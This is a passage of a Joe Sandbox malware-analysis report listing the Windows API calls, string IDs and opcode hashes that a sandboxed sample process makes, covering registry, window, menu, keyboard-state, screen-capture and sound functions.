                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103C1D2
                                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 0103C26A
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0103C2DE
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0103C2FC
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0103C352
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103C364
                                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0103C382
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0103C3E3
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103C3F4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 01033035
                                                                                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 01033045
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 01033051
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0103305E
                                                                                                                                                                                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 010330CA
                                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 01033109
                                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0103312D
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 01033135
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0103313E
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 01033145
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 01033150
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0104A990
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 0104A9A7
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0104A9B3
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0104A9C9
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0104AC15
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0104AC33
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0104AC54
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0104AC73
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0104AC95
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 0104ACBB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 3962739598-2766056989
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 010152E6
• GetWindowTextW.USER32(?,?,00000400), ref: 01015328
• _wcslen.LIBCMT ref: 01015339
• CharUpperBuffW.USER32(?,00000000), ref: 01015345
• _wcsstr.LIBVCRUNTIME ref: 0101537A
• GetClassNameW.USER32(00000018,?,00000400), ref: 010153B2
• GetWindowTextW.USER32(?,?,00000400), ref: 010153EB
• GetClassNameW.USER32(00000018,?,00000400), ref: 01015445
• GetClassNameW.USER32(?,?,00000400), ref: 01015477
• GetWindowRect.USER32(?,?), ref: 010154EF
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 6badd7133afbc61cd1a19ea4b6a3c7f954cada80464076936c659c0940c82d14
• Instruction ID: 3ea389c0ea0a24ef61f26becbec4cfb9695ca63b620cec0a2d6c4e5139393d12
• Opcode Fuzzy Hash: 6badd7133afbc61cd1a19ea4b6a3c7f954cada80464076936c659c0940c82d14
• Instruction Fuzzy Hash: 35912571104706AFD709DF28CD90BAAB7E9FF86304F044519FAC68B185EB39E915CB81
APIs
  • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010497B6
• GetFocus.USER32 ref: 010497C6
• GetDlgCtrlID.USER32(00000000), ref: 010497D1
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 01049879
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0104992B
• GetMenuItemCount.USER32(?), ref: 01049948
• GetMenuItemID.USER32(?,00000000), ref: 01049958
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0104998A
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 010499CC
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 010499FD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
• String ID: 0
• API String ID: 1026556194-4108050209
• Opcode ID: f426cd045e0cf33b38920b4c42c6c3fca83a904fb30a29a6c01d2ddff21ce939
• Instruction ID: 5d83afaa5d8f300b8e225038e2320c6fe80e7325a28cfff6811b96f4343535aa
• Opcode Fuzzy Hash: f426cd045e0cf33b38920b4c42c6c3fca83a904fb30a29a6c01d2ddff21ce939
• Instruction Fuzzy Hash: 1B81A1B55043019FEB21CF58C8C4AAB7BE8BB88358F04497DF9C597281DB35D905CBA1
APIs
• GetMenuItemInfoW.USER32(010829C0,000000FF,00000000,00000030), ref: 0101C973
• SetMenuItemInfoW.USER32(010829C0,00000004,00000000,00000030), ref: 0101C9A8
• Sleep.KERNEL32(000001F4), ref: 0101C9BA
• GetMenuItemCount.USER32(?), ref: 0101CA00
• GetMenuItemID.USER32(?,00000000), ref: 0101CA1D
• GetMenuItemID.USER32(?,-00000001), ref: 0101CA49
• GetMenuItemID.USER32(?,?), ref: 0101CA90
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101CAD6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101CAEB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101CB0C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID: 0
• API String ID: 1460738036-4108050209
• Opcode ID: 00cea6e29edcb758f85a3fcdb303a00a665a05606245cef908e7318b3afc2012
• Instruction ID: 6585fb58a3e61d7c9168e21a19c0ee54f4be28e190d0c048677f96b5fe65d177
• Opcode Fuzzy Hash: 00cea6e29edcb758f85a3fcdb303a00a665a05606245cef908e7318b3afc2012
• Instruction Fuzzy Hash: AD6195B1940245AFFF22CFA8DA88AFE7FB9FB05348F044055E991A3145DB39E900DB61
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 0101E4D4
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0101E4FA
• _wcslen.LIBCMT ref: 0101E504
• _wcsstr.LIBVCRUNTIME ref: 0101E554
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0101E570
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                        • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                                        • Opcode ID: 19dd5cabf667194617b50cd238e99b92d30040515fdd09e17455b0d7bd19f30a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5c8be3944e7ffd65cba23556422dd4f8ac46cd2205b56ad764758b8a36957153
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19dd5cabf667194617b50cd238e99b92d30040515fdd09e17455b0d7bd19f30a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC411972A402147BDB01A7A5CC47FBF77ADDF55750F04006AF940A6182FB7DD601A3A5
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103D6C4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0103D6ED
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103D7A8
  • Part of subcall function 0103D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0103D70A
  • Part of subcall function 0103D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0103D71D
  • Part of subcall function 0103D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103D72F
  • Part of subcall function 0103D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103D765
  • Part of subcall function 0103D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103D788
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0103D753
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
• Opcode ID: fced4a0fb89591b73245b7a8d933070aa6cecb1da373631f9dd6fcc22185722d
• Instruction ID: e104bbf4df5c310ced39f03135980b79295ff189c34261772b5d98e636cfbe59
• Opcode Fuzzy Hash: fced4a0fb89591b73245b7a8d933070aa6cecb1da373631f9dd6fcc22185722d
• Instruction Fuzzy Hash: 153182B5A01129BBD7229AD5DCC8EFF7BBCEF95650F0000A5B985E3204E7349A459BA0
APIs
• timeGetTime.WINMM ref: 0101EFCB
  • Part of subcall function 00FCF215: timeGetTime.WINMM(?,?,0101EFEB), ref: 00FCF219
• Sleep.KERNEL32(0000000A), ref: 0101EFF8
• EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0101F01C
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0101F03E
• SetActiveWindow.USER32 ref: 0101F05D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0101F06B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0101F08A
• Sleep.KERNEL32(000000FA), ref: 0101F095
• IsWindow.USER32 ref: 0101F0A1
• EndDialog.USER32(00000000), ref: 0101F0B2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: e52729594189e7f5ed884565d8d62b7d390f3ed611a64b84c61098a8252a17ed
• Instruction ID: 5d4203e971097a40694521bccdd47a3f13c3f3aed7868b0d54527b5b7c0f13d2
• Opcode Fuzzy Hash: e52729594189e7f5ed884565d8d62b7d390f3ed611a64b84c61098a8252a17ed
• Instruction Fuzzy Hash: 7321F9B9504205AFE3326F64ECC8B2E7FA9F799B48B008014F9C58625DCB7F8854C755
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0101F374
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0101F38A
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101F39B
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0101F3AD
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0101F3BE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                                        • Opcode ID: c28a4655151641442b0819b235815adca53db6ee8a64033616829a4fa27e2153
                                                                                                                                                                                                                                                                                                        • Instruction ID: 76321b01f7c11ff5c1c4db2c5a7de97ac3e4611b16b0b0bfddce553b976ba64d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c28a4655151641442b0819b235815adca53db6ee8a64033616829a4fa27e2153
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4211A331A9125A79D720A367CC4AEFFBABCEBD6B80F00042E7441E6095DAA85905C9B5
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101A9D9
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0101AA44
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 0101AA64
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 0101AA7B
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 0101AAAA
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 0101AABB
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 0101AAE7
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 0101AAF5
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0101AB1E
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 0101AB2C
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 0101AB55
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 0101AB63
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ab482c0e13a22a29ebef1f855b91e3d72a58022e1631f862a7de67e5c3e62a3a
                                                                                                                                                                                                                                                                                                        • Instruction ID: e286dfc647d0ecbaec9864ea45a9c4939d049876680bf1d5b52d7e416adc0955
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab482c0e13a22a29ebef1f855b91e3d72a58022e1631f862a7de67e5c3e62a3a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5151E264B057C9A9FB31D7B88990BEABFF59F12240F0845D9C6C20B1C7DA6C968CC761
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 01016649
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01016662
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 010166C0
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 010166D0
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 010166E2
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 01016736
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 01016744
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01016756
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 01016798
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 010167AB
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 010167C1
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 010167CE
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7df2f77eef2165c708018046bdcd94a2e294c326988ef2789c275a28b96c7b4c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9d749a01d54ac55ccf26ea5fa3d9edea85ec96752c256d87530c8d58a997e316
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7df2f77eef2165c708018046bdcd94a2e294c326988ef2789c275a28b96c7b4c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D65150B4B00205AFDF18CFA8DD99AAEBBB5FB58310F108168F549E7294E7B59D00CB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB1488,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FB1865
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00FB1521
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FB15BB
                                                                                                                                                                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00FF29B4
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FF29E2
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FB145A,00000000,?), ref: 00FF29F9
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FB145A,00000000), ref: 00FF2A15
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00FF2A27
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: debd7e90c50cb41a2869e992b7911d7b9ab78e323023936479a2cab83c43c330
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78ea7ab7a1659d3e55f3b5e6fefb4d130d7b5015f957806540f7b59de650ec4d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: debd7e90c50cb41a2869e992b7911d7b9ab78e323023936479a2cab83c43c330
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC61A631904705DFDB36DF16C998B6A77B1FF80322F944018E4C28B664C77AA891EF84
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB2234: GetWindowLongW.USER32(?,000000EB), ref: 00FB2242
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00FB2152
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 882903a87cf239ca239bae25e6b56d959b61aa0c0da30b21d873fe86fcb8ef48
